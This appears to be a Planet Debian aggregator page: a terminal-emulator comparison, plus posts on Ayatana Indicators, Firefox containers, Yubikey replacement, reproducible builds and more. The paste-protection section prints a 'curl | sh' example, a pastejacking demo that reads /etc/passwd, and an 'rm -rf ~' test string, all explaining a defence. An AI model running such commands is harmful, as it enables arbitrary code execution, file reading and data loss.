By default, xterm uses the classic "fixed" font which, according to Wikipedia, has "substantial Unicode coverage since 1997". Something is happening here that makes the character display as a box: only by bumping the font size to "Huge" (20 points) is the character finally displayed correctly, and then other characters fail to display correctly:

Those screenshots were generated on Fedora 27 as it gave better results than Debian 9, where some older versions of the terminals (mlterm, namely) would fail to properly fallback across fonts. Thankfully, this seems to have been fixed in later versions.

Now notice the order of the string displayed by xterm: it turns out that Mem and the following character, the Semitic Qoph, are both part of right-to-left (RTL) scripts, so technically, they should be rendered right to left when displayed. Web browsers like Firefox 57 handle this correctly in the above string. A simpler test is the word "Sarah" in Hebrew (שרה). The Wikipedia page about bi-directional text explains that:

Many computer programs fail to display bi-directional text correctly. For example, the Hebrew name Sarah (שרה) is spelled: sin (ש) (which appears rightmost), then resh (ר), and finally heh (ה) (which should appear leftmost).

Many terminals fail this test: Alacritty, VTE-derivatives (GNOME Terminal, Terminator, and XFCE Terminal), urxvt, st, and xterm all show Sarah's name backwards—as if we would display it as "Haras" in English.

The other challenge with bi-directional text is how to align it, especially mixed RTL and left-to-right (LTR) text. RTL scripts should start from the right side of the terminal, but what should happen in a terminal where the prompt is in English, on the left? Most terminals do not make special provisions and align all of the text on the left, including Konsole, which otherwise displays Sarah's name in the right order. Here, pterm and mlterm seem to be sticking to the standard a little more closely and align the test string on the right.

Paste protection

The next critical feature I have identified is paste protection. While it is widely known that incantations like:

$ curl http://example.com/ | sh

are arbitrary code execution vectors, a less well-known vulnerability is that hidden commands can sneak into copy-pasted text from a web browser, even after careful review. Jann Horn's test site brilliantly shows how the apparently innocuous command:

git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

gets turned into this nasty mess (reformatted a bit for easier reading) when pasted from Horn's site into a terminal:

git clone /dev/null; clear;
echo -n "Hello "; whoami|tr -d '\n';
echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust! \
Here'"'"'s the first line of your /etc/passwd: ';
head -n1 /etc/passwd
git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

This works by hiding the evil code in a <span> block that's moved out of the viewport using CSS.

Bracketed paste mode is explicitly designed to neutralize this attack. In this mode, terminals wrap pasted text in a pair of special escape sequences to inform the shell of that text's origin. The shell can then ignore special editing characters found in the pasted text. Terminals going all the way back to the venerable xterm have supported this feature, but bracketed paste also needs support from the shell or application running on the terminal. For example, software using GNU Readline (e.g. Bash) needs the following in the ~/.inputrc file:

set enable-bracketed-paste on

Unfortunately, Horn's test page also shows how to bypass this protection, by including the end-of-pasted-text sequence in the pasted text itself, thus ending the bracketed mode prematurely. This works because some terminals do not properly filter escape sequences before adding their own. For example, in my tests, Konsole fails to properly escape the second test, even with .inputrc properly configured. That means it is easy to end up with a broken configuration, either due to an unsupported application or misconfigured shell. This is particularly likely when logged on to remote servers where carefully crafted configuration files may be less common, especially if you operate many different machines.
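To see why the filtering matters, here is a small sketch of what a terminal has to do when bracketed paste mode is active: wrap the pasted text in the standard start/end markers (ESC[200~ and ESC[201~) only after stripping any end marker already embedded in the paste. The sanitizing step is exactly what some terminals skip:

// Sketch of a terminal-side paste handler for bracketed paste mode.
fn bracketed_paste(pasted: &str) -> String {
    // Strip any embedded "end of paste" sequence; otherwise a malicious paste
    // can close bracketed mode early and feed live input to the shell.
    let sanitized = pasted.replace("\x1b[201~", "");
    format!("\x1b[200~{}\x1b[201~", sanitized)
}

fn main() {
    let evil = "ls\x1b[201~\nrm -rf ~ # would run live if not sanitized\n";
    println!("{:?}", bracketed_paste(evil));
}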

A good solution to this problem is the confirm-paste plugin of the urxvt terminal, which simply prompts before allowing any paste with a newline character. I haven't found another terminal with such definitive protection against the attack described by Horn.

Tabs and profiles

A popular feature is support for a tabbed interface, which we'll define broadly as a single terminal window holding multiple terminals. This feature varies across terminals: while traditional terminals like xterm do not support tabs at all, more modern implementations like Xfce Terminal, GNOME Terminal, and Konsole all have tab support. Urxvt also features tab support through a plugin. But in terms of tab support, Terminator takes the prize: not only does it support tabs, but it can also tile terminals in arbitrary patterns (as seen at the right).

Another feature of Terminator is the capability to "group" those tabs together and to send the same keystrokes to a set of terminals all at once, which provides a crude way to do mass operations on multiple servers simultaneously. A similar feature is also implemented in Konsole. Third-party software like Cluster SSH, xlax, or tmux must be used to have this functionality in other terminals.

Tabs work especially well with the notion of "profiles": for example, you may have one tab for your email, another for chat, and so on. This is well supported by Konsole and GNOME Terminal; both allow each tab to automatically start a profile. Terminator, on the other hand, supports profiles, but I could not find a way to have specific tabs automatically start a given program. Other terminals do not have the concept of "profiles" at all.

Eye candy

The last feature I considered is the terminal's look and feel. For example, GNOME, Xfce, and urxvt support transparency, background colors, and background images. Terminator also supports transparency, but recently dropped support for background images, which made some people switch away to another tiling terminal, Tilix. I am personally happy with only a Xresources file setting a basic color set (Solarized) for urxvt. Such non-standard color themes can create problems however. Solarized, for example, breaks with color-using applications such as htop and IPTraf.

While the original VT100 terminal did not support colors, newer terminals usually did, but were often limited to a 256-color palette. For power users styling their terminals, shell prompts, or status bars in more elaborate ways, this can be a frustrating limitation. A Gist keeps track of which terminals have "true color" support. My tests also confirm that st, Alacritty, and the VTE-derived terminals I tested have excellent true color support. Other terminals, however, do not fare so well and actually fail to display even 256 colors. You can see below the difference between true color support in GNOME Terminal, st, and xterm, which still does a decent job at approximating the colors using its 256-color palette. Urxvt not only fails the test but even shows blinking characters instead of colors.

Some terminals also parse the text for URL patterns to make them clickable. This is the case for all VTE-derived terminals, while urxvt requires the matcher plugin to visit URLs through a mouse click or keyboard shortcut. Other terminals reviewed do not display URLs in any special way.

Finally, a new trend treats scrollback buffers as an optional feature. For example, st has no scrollback buffer at all, pointing people toward terminal multiplexers like tmux and GNU Screen in its FAQ. Alacritty also lacks scrollback buffers but will add support soon because there was "so much pushback on the scrollback support". Apart from those outliers, every terminal I could find supports scrollback buffers.

Preliminary conclusions

In the next article, we'll compare performance characteristics like memory usage, speed, and latency of the terminals. But we can already see that some terminals have serious drawbacks. For example, users dealing with RTL scripts on a regular basis may be interested in mlterm and pterm, as they seem to have better support for those scripts. Konsole gets away with a good score here as well. Users who do not normally work with RTL scripts will also be happy with the other terminal choices.

In terms of paste protection, urxvt stands alone above the rest with its special feature, which I find particularly convenient. Those looking for all the bells and whistles will probably head toward terminals like Konsole. Finally, it should be noted that the VTE library provides an excellent basis for terminals to provide true color support, URL detection, and so on. So at first glance, the default terminal provided by your favorite desktop environment might just fit the bill, but we'll reserve judgment until our look at performance in the next article.

This article first appeared in the Linux Weekly News.

Antoine Beaupré https://anarc.at/tag/debian-planet/ pages tagged debian-planet

The subjectification of a racial group

Planet Debian - Fri, 30/03/2018 - 12:13am

In the philosophy department the other day we were discussing race-based sexual preferences. As well as considering the cases in which this is ethically problematic, we were trying to determine cases in which it might be okay.

A colleague suggested that a preference with the following history would not be problematic. There is a culture with which he feels a strong affiliation, having spent time living in this culture and having a keen interest in various aspects of that culture, such as its food. As a result, he is more likely, on average, to find himself sexually attracted to someone from that culture—he shares something with them. And since almost all members of that culture are of a particular racial group, that means he is more likely to find himself sexually attracted to someone of that race than to other races, ceteris paribus.

The cultural affiliation is something good. The sexual preference is then an ethically neutral side effect of that affiliation. My colleague suggested a name for the process which is responsible for the preference: he has subjectified his relationship with the culture. Instead of objectifying members of that group, as happens with problematic race-based sexual preferences, he has done something which counts as the opposite.

I am interested in thinking more about the idea of subjectification.

Sean Whitton https://spwhitton.name//blog/ Notes from the Library

Starting the Ayatana Indicators Transition in Debian

Planet Debian - Thu, 29/03/2018 - 3:03pm

This is to make people aware and inform about an ongoing effort to replace Indicators in Debian (most people know the concept from Ubuntu) by a more generically developed and actively maintained fork: Ayatana Indicators.

TL;DR;

In Debian, we will soon start sending out patches to SNI supporting applications via Debian's BTS (and upstream trackers, too, probably), that make the shift from Ubuntu AppIndicator (badly maintained in Debian) to Ayatana AppIndicator.

Status of the work being done is documented here: https://wiki.debian.org/Ayatana/IndicatorsTransition

Why Ayatana Indicators

The fork is currently pushed forward by the Debian and Ubuntu MATE packaging team.

The Indicators concept has originally been documented by Canonical, find your entry point in the readings here [1,2].

Some great work and achievement was done around Ubuntu Indicators by Canonical Ltd. and the Indicators concept has always been a special identifying feature of Ubuntu. Now with the switch to GNOMEv3, the future of Indicators in Ubuntu is uncertain. This is where Ayatana Indicators come in...

The main problem with Ubuntu Indicators today (and ever since) is (has been): they only work properly on Ubuntu, mostly because of one Ubuntu-specific patch against GTK-3 [3].

In Ayatana Indicators (speaking with my upstream hat on now), we are currently working on a re-implementation of the rendering part of the indicators (using GTK's popovers rather than menushells), so that it works on vanilla GTK-3. Help from GTK-3 developers is highly welcome, in case you feel like chiming in.

Furthermore, the various indicator icons in Ubuntu (-session, -power, -sound, etc. - see below for more info) have been targeted more and more for sole usage with the Unity 7 and 8 desktop environments. They can be used with other desktop environments, but are likely to behave quite agnostic (and sometimes stupid) there.

In Ayatana Indicators, we are working on generalizing the functionality of those indicator icon applications and make them more gnostic on other desktop environments.

Ayatana Indicators as an upstream project will be very open to contributions from other desktop environment developers that want to utilize the indicator icons with their desktop shell, but need adaptations for their environment. Furthermore, we want to encourage Unity 7 and Unity 8 developers to consider switching over (and getting one step further with the goal of shipping Unity on non-Ubuntu systems). With the Unity 8 maintainers (the people from UBports / Ubuntu Touch) first discussion exchanges have taken place.

The different Components of Ayatana Indicators

The 'indicator-renderer' Applets

These are mostly panel plugins that render the system tray icons and menus (and widgets) defined by indicator-aware applications. They normally come with your desktop environment (if it supports indicators).

Letting the desktop environment render the system tray itself assures that the indicator icons (i.e. the desktop system tray) looks just like the rest of the desktop shell. With the classical (xembed based) system tray (or notification) areas, all applications render their icon and menus themselves, which can cause theming problems and a11y issues and more.

Examples of indicator renderers are: mate-indicator-applet, budgie-indicator-applet, xfce4-indicator-plugin, etc.

Shared Library: Rendering and Loading of Indicators

The Ayatana Indicators project currently only provides a rendering shared lib for GTK-2 and GTK-3 based applications. We still need to connect better with the Qt-world.

The rendering library (used by the above renderers) is libayatana-indicator.

This library supports:

  • loading and rendering of old style indicators
  • loading and rendering of NG indicators

The libayatana-indicator library also utilizes a variety of versatile GTK-3 widgets defined in another shared library: ayatana-ido.

Ayatana Indicator Applets

The Ayatana Indicators project continues and generalizes various indicator icon applications that are not applications by themselves really, but more like system / desktop control elements:

  • ayatana-indicator-session (logout, lock screen, user guides, etc.)
  • ayatana-indicator-power (power management)
  • ayatana-indicator-sound (sound and multimedia control)
  • ayatana-indicator-datetime (clock, calendar, evolution-data-server integration)
  • ayatana-indicator-notifications (libnotify collector of system messages)
  • ayatana-indicator-printers (interact with CUPS print jobs and queues)

These indicators are currently under heavy re-development. The current effort in Ayatana Indicators is to make them far more generic and usable on all desktop environments that want to support them. E.g. we recently added XFCE awareness to the -session and the -power indicator icons.

One special indicator icon is the Ayatana Indicator Application indicator. It provides SNI support to third-party applications (see below). For the desktop applet, it appears just like any of the other above named indicators, but it opens the door to the world of SNI supporting applications.

One available and easy-to-install test case in Debian buster for indicator icons provided by the Ayatana Indicators project is the arctica-greeter package. The icons displayed in the greeter are Ayatana Indicators.

Ayatana AppIndicator API

The Ayatana AppIndicator API is just one way of talking to an SNI DBus service. The implementation is done in the shared lib 'libayatana-appindicator'. This library provides an easy to implement API that allows GTK-2/3 applications to create an indicator icon in a panel with an indicator renderer added.

In the application, the developer creates a generic menu structure and defines one or more icons for the system tray (more than one icon: only one icon is shown (plus some text, if needed), but that icon may change based on the applet's status). This generic menu is sent to a DBus interface (org.kde.StatusNotifier). Sometimes, people say that such applications have SNI support (StatusNotifier Interface support).

The Ayatana Indicators project offers Ayatana AppIndicator to GTK-3 developers (and GTK-2, but well...). Canonical implemented bindings for Python2, Perl, GIR, Mono/CLI and we continue to support these as long as it makes sense.

The nice part of Ayatana AppIndicator shared library is: if a desktop shell does not offer the SNI service, then it tries to fall back to the xembed-way of adding system tray icons to your panel / status bar.

In Debian, we will start sending out patches to SNI-supporting applications soon, that make the shift from Ubuntu AppIndicator (badly maintained in Debian) to Ayatana AppIndicator. The cool part of this is: you can convert your GTK-3 application from Ubuntu AppIndicator to Ayatana AppIndicator and use it on top of any(!) SNI implementation, be it an applet based on Ubuntu Indicators, based on Ayatana Indicators or some other implementation, like the vala-sntray-applet or SNI support in KDE.

Further Readings

Some more URLs for deeper reading...

You can also find more info on my blog: https://sunweavers.net

References sunweaver http://sunweavers.net/blog/blog/1 sunweaver's blog

food, consumer experience and Joshi Wadewala

Planet Debian - Enj, 29/03/2018 - 9:29pd

For a while now, I have been looking at the various ways in which food quality is checked by different people. The only proper or official authority is FSSAI, but according to the CAG and Quartz's own web report, FSSAI still has a long way to go.

The reason I share this is that over the years I have mentioned how Joshi Wadewala has managed to outdo what others could also have done. But lately, it seems the staff and the owners have grown lax and arrogant about the quality of food and service they provide. For instance, FSSAI's labelling rules say the following –

Labelling

It is mandatory that every package of food intended for sale carries a label that bears all the information required under the FSS (Packaging and Labelling) Regulation, 2011. A food package must carry a label with the following information:

  • Common name of the Product
  • Name and address of the product's Manufacturer
  • Date of Manufacture
  • Ingredient List with additives
  • Nutrition Facts
  • Best before / Expires on
  • Net contents in terms of weight, measure or count
  • Packing codes / Batch number
  • Declaration regarding vegetarian or non-vegetarian
  • Country of origin for imported food

Also, many a time their fresh food is either not fresh or not cooked properly. This has been happening for a couple of weeks now. I have to point out that they are not the only ones, although this is a proper shop, not a pavement dweller per se.

I did file my concern with FSSAI, but I highly doubt any action will be taken; although it is a public safety and health issue, the big players are never caught, and he is only a smallish-time operator.

It is also a concern because my mother has no teeth, and because I was diagnosed with convulsive seizures last year, which prevented me from attending DebConf; I was in hospital for a period of 3 months.

I have stopped going to the establishment, as there are others who are better at receiving feedback and strive to be better.

Disclaimer – All the photos shared are copyright zomato.com

I also have no idea whether GST is paid or not, as you do not get any receipt for your purchases, which is also one of the basic consumer rights. They just have one slip which you get when you make your purchase and have to hand over for either take-away or getting your food.

They do have a bill book but that is for bulk purchases only.

shirishag75 https://flossexperiences.wordpress.com #planet-debian – Experiences in the community

Limit personal data exposure with Firefox containers

Planet Debian - Mër, 28/03/2018 - 8:44md

There was some noise recently about the massive amount of data gathered by Cambridge Analytica from Facebook users. While I don't use Facebook myself, I do use Google and other services which are known to gather a massive amount of data, and I obviously know a lot of people using those services. I also saw some posts or tweet threads about the data collection those services do.

Mozilla recently released a Firefox extension to help users confine Facebook data collection. This addon is actually based on the containers technology Mozilla has been developing for a few years. It started as an experimental feature in Nightly, then as a Test Pilot experiment, and finally evolved into a fully featured extension called Multi-Account Containers. A somewhat restricted version of this is even included directly in Firefox, but without the extension you don't get the configuration window and you need to configure it manually with about:config.

Basically, containers separate storage (cookies, site preferences, login sessions, etc.) and enable a user to isolate various aspects of their online life by only staying logged in to specific websites in their respective containers. In a way it looks like having a separate Firefox profile per website, but it's a lot more usable day to day.

I use this extension massively, in order to isolate each website. I have one container for Google, one for Twitter, one for banking etc. If I used Facebook, I would have a Facebook container, if I used gmail I would have a gmail container. Then, my day to day browsing is done using the “default” container, where I'm not logged to any website, so tracking is minimal (I also use uBlock origin to reduce ads and tracking).

That way, my online life is compartmentalized/containerized: Google doesn't always associate my web searches with my account (I actually usually use DuckDuckGo, but sometimes I do a Google search), Twitter only knows about the tweets I read, and I don't expose all my cookies to every website.

The extension and support pages are really helpful to get started, but basically:

  • you install the extension from the extension page
  • you create new containers for the various websites you want using the menu
  • when you open a new tab you can opt to open it in a selected container by long pressing on the + button
  • the current container is shown in the URL bar and with a color underline on the current tab
  • it's also optionally possible to assign a website to a container (for example, always open facebook.com in the Facebook container), which can help restrict data exposure but might prevent you from browsing that site unidentified

When you're inside a container and you want to follow a link, you can get out of the container by right-clicking on the link, selecting “Open link in new container tab” and then selecting “no container”. That way Facebook won't follow you on that website and you'll start fresh (after the redirection).

As far as I can tell it's not yet possible to have disposable containers (which would be trashed after you close the tab) but a feature request is open and another extension seems to exist.

In the end, and while the isolation from that extension is not perfect, I really suggest Firefox users give it a try. In my opinion it's really easy to use and really helps maintain healthy barriers on one's online presence. I don't know of an equivalent system for Chromium (or Safari) users, but if you know of one feel free to point me to it.

A French version of this post is also available here just in case.

Yves-Alexis corsac@debian.org Corsac.net - Debian

Reproducible Builds: Weekly report #152

Planet Debian - Mar, 27/03/2018 - 11:33md

Here's what happened in the Reproducible Builds effort between Sunday March 18 and Saturday March 24 2018:

Packages reviewed and fixed, and bugs filed

diffoscope development

diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This week, version 92 was uploaded to unstable by Chris Lamb. It included contributions already covered by posts in previous weeks as well as new ones from:

reprotest development

reprotest is our tool to build software and check it for reproducibility.

trydiffoscope development

trydiffoscope is a lightweight command-line tool to the try.diffoscope.org web-based version of diffoscope.

Reviews of unreproducible packages

88 package reviews have been added, 109 have been updated and 18 have been removed in this week, adding to our knowledge about identified issues.

A random_order_in_javahelper_manifest_files toolchain issue was added by Chris Lamb and the timestamps_in_pdf_generated_by_inkscape toolchain issue was also updated with a URI to the upstream discussion.

Weekly QA work

During our reproducibility testing, FTBFS bugs have been detected and reported by:

  • Adrian Bunk (66)
  • Jeremy Bicha (1)
  • Michael Olbrich (1)
  • Ole Streicher (1)
  • Sebastien KALT (1)
  • Thorsten Glaser (1)
Misc.

This week's edition was written by Bernhard M. Wiedemann, Chris Lamb & Holger Levsen & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Reproducible builds folks https://reproducible.alioth.debian.org/blog/ Reproducible builds blog

Replacing a lost Yubikey

Planet Debian - Mër, 14/03/2018 - 7:05pd

Some weeks ago I lost my purse with everything in there, from residency card, driving license, credit cards, cash cards, all kinds of ID cards, and last but not least my Yubikey NEO. This being Japan, I did expect that the purse would show up in a few days, most probably with the money gone but all the cards intact. Unfortunately, not this time. So after having finally reissued most of the cards, I also took the necessary steps concerning the Yubikey, which contained my GnuPG subkeys and was used as a second factor for several services (see here and here).

Although the GnuPG keys on the Yubikey are considered safe from extraction, I still decided to revoke them and create new subkeys – this is one of the big advantages of subkeys: one does not start from zero, but simply creates new subkeys instead of running around trying to get signatures again.

Another thing that has to be done is removing the old Yubikey from all the services where it was used as a second factor. In my case that was quite a lot (Google, GitHub, Dropbox, NextCloud, WordPress, …). BTW, you do have a set of backup keys saved somewhere for all the services you are using, right? It helps a lot when getting back into the systems.

GnuPG keys renewal

To remind myself of what is necessary, here are the steps:

  • Get your master key from the backup USB stick
  • revoke the three subkeys that are on the Yubikey
  • create new subkeys
  • install the new subkeys onto a new Yubikey, update keyservers

All of that is quite straightforward: use gpg --expert --edit-key YOUR_KEY_ID, then select each subkey with key N and revoke it with revkey. You can select all three subkeys and revoke them at the same time: just type key N for each of the subkeys (where N is the index of the key, starting from 0).

Next, create new subkeys; here you can follow the steps laid out in the original blog post. In the same way you can move them to a new Yubikey NEO (good that I bought three of them back then!).

Last but not least you have to update the key-servers with your new public key, which is normally done with gpg --send-keys (again see the original blog).

The most tricky part was setting up and distributing the keys on my various computers: The master key remains as usual on offline media only. On my main desktop at home I have the subkeys available, while on my laptop I only have stubs pointing at the Yubikey. This needs a bit of shuffling around, but should be obvious somehow when looking at the previous blogs.

Full disk encryption

I also had my Yubikey registered as an unlock device for the LUKS-based full disk encryption. The status before the update was as follows:

$ cryptsetup luksDump /dev/sdaN
Version:        1
Cipher name:    aes
....
Key Slot 0: ENABLED
...
Key Slot 1: DISABLED
Key Slot 2: DISABLED
Key Slot 3: DISABLED
Key Slot 4: DISABLED
Key Slot 5: DISABLED
Key Slot 6: DISABLED
Key Slot 7: ENABLED
...

I was fairly sure that the slot for the old Yubikey was slot 7, but not completely certain. So I first registered the new Yubikey in slot 6 with

yubikey-luks-enroll -s 6 -d /dev/sdaN

and checked that I could unlock during boot using the new Yubikey. Then I cleared the key information in slot 7 with

cryptsetup luksKillSlot /dev/sdaN 7

and again made sure that I could boot using my passphrase (in slot 0) and the new Yubikey (in slot 6).

TOTP/U2F second factor authentication

The last step was re-registering the new Yubikey with all the favorite services as a second factor, removing the old key along the way. In my case the list comprises several WordPress sites, GitHub, Google, NextCloud, Dropbox, and whatever else I have forgotten.

Although this is nearly the worst-case scenario (ok, the main key was not compromised!), everything went very smoothly and easily, to my big surprise. Even my Debian upload ability was not interrupted considerably. All in all it shows that having subkeys on a Yubikey is a very useful and effective solution.

Norbert Preining https://www.preining.info/blog There and back again

Playing with water

Planet Debian - Mër, 14/03/2018 - 5:00pd

I'm currently taking a machine learning class and although it is an insane amount of work, I like it a lot. I initially had planned to use R to play around with the database I have, but the teacher recommended I use H2o, a FOSS machine learning framework.

I was a bit sceptical at first since I'm already pretty good with R, but then I found out you could simply import H2o as an R library. H2o replaces most R functions by its own parallelized ones to cut down on processing time (no more doParallel calls) and uses an "external" server you have to run on the side instead of running R calls directly.

I was pretty happy with this situation, that is until I actually started using H2o in R. With the huge database I'm playing with, the library felt clunky and I had a hard time doing anything useful. Most of the time, I just ended up with long Java traceback calls. Much love.

I'm sure in the right hands using H2o as a library could have been incredibly powerful, but sadly it seems I haven't earned my black belt in R-fu yet.

I was pissed for at least a whole day - not being able to achieve what I wanted to do - until I realised H2o comes with a WebUI called Flow. I'm normally not very fond of using web thingies to do important work like writing code, but Flow is simply incredible.

Automated graphing functions, integrated ETAs when running resource-intensive models, descriptions for each and every model parameter (the parameters are even divided into sections based on your familiarity with the statistical models in question): Flow seemingly has it all. In no time I was able to run 3 basic machine learning models and get actual interpretable results.

So yeah, if you've been itching to analyse very large databases using state of the art machine learning models, I would recommend using H2o. Try Flow at first instead of the Python or R hooks to see what it's capable of doing.
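For reference, here is a minimal sketch (not from the original post) of what the Python hook looks like; the file name, column names and model choice are made up for illustration:

import h2o
from h2o.estimators.gbm import H2OGradientBoostingEstimator

h2o.init()                               # start or attach to the local H2o server
frame = h2o.import_file("my_data.csv")   # hypothetical dataset
train, test = frame.split_frame(ratios=[0.8])

model = H2OGradientBoostingEstimator(ntrees=50)
model.train(x=["feature_a", "feature_b"],  # hypothetical predictor columns
            y="target",                    # hypothetical response column
            training_frame=train)
print(model.model_performance(test))

The R library exposes essentially the same workflow through functions like h2o.init() and h2o.importFile(), just wrapped as R calls.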

The only downside to all of this is that H2o is written in Java and depends on Java 1.7 to run... That, and be warned: it requires a metric fuckton of processing power and RAM. My poor server struggled quite a bit even with 10 available cores and 10Gb of RAM...

Louis-Philippe Véronneau https://veronneau.org/ Louis-Philippe Véronneau

Reproducible Builds: Weekly report #149

Planet Debian - Mër, 07/03/2018 - 4:21pd

Here's what happened in the Reproducible Builds effort between Sunday February 25 and Saturday March 3 2018:

diffoscope development

Version 91 was uploaded to unstable by Mattia Rizzolo. It included contributions already covered by posts of the previous weeks as well as new ones from:

In addition, Juliana — our Outreachy intern — continued her work on parallel processing; the above work is part of it.

reproducible-website development

Packages reviewed and fixed, and bugs filed

An issue with the pydoctor documentation generator was merged upstream.

Reviews of unreproducible packages

73 package reviews have been added, 37 have been updated and 26 have been removed in this week, adding to our knowledge about identified issues.

Weekly QA work

During our reproducibility testing, FTBFS bugs have been detected and reported by:

  • Adrian Bunk (46)
  • Jeremy Bicha (4)
Misc.

This week's edition was written by Chris Lamb, Mattia Rizzolo & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Reproducible builds folks https://reproducible.alioth.debian.org/blog/ Reproducible builds blog

Skellam distribution likelihood

Planet Debian - Mar, 06/03/2018 - 10:37md

I wondered if it was possible to make a ranking system based on the Skellam distribution, taking point spread as the only input; the first step is figuring out what the likelihood looks like, so here's an example for k=4 (i.e., one team beat the other by four goals):

It's pretty, but unfortunately, it shows that the most likely combination is µ1 = 0 and µ2 = 4, which isn't really that realistic. I don't know what I expected, though :-)

Perhaps it's different when we start summing many of them (more games, more teams), but then the dimensionality gets too high to plot. If nothing else, it shows that it's hard to solve symbolically by looking for derivatives, as the extreme point is on an edge, not on a hill.
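For the curious, here is a minimal sketch (not part of the original post) of how such a single-observation likelihood surface can be evaluated numerically with SciPy. The Skellam pmf is P(k; µ1, µ2) = exp(-(µ1+µ2)) · (µ1/µ2)^(k/2) · I_k(2·sqrt(µ1·µ2)), with I_k the modified Bessel function of the first kind; the grid range below is arbitrary:

import numpy as np
from scipy.stats import skellam

k = 4                                  # observed point spread
mus = np.linspace(0.01, 8.0, 200)      # grid for both rate parameters (avoid exactly 0)
m1, m2 = np.meshgrid(mus, mus, indexing="ij")
lik = skellam.pmf(k, m1, m2)           # single-observation likelihood over (mu1, mu2)

i, j = np.unravel_index(np.argmax(lik), lik.shape)
print("max likelihood %.4f at mu1=%.2f, mu2=%.2f" % (lik[i, j], mus[i], mus[j]))
# With scipy's convention k = n1 - n2, the maximum lands on the boundary of the
# grid (one of the rates close to zero), matching the observation above that the
# extreme point sits on an edge rather than on a hill.

Which of the two rates ends up near zero depends only on the sign convention chosen for the spread.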

Steinar H. Gunderson http://blog.sesse.net/ Steinar H. Gunderson
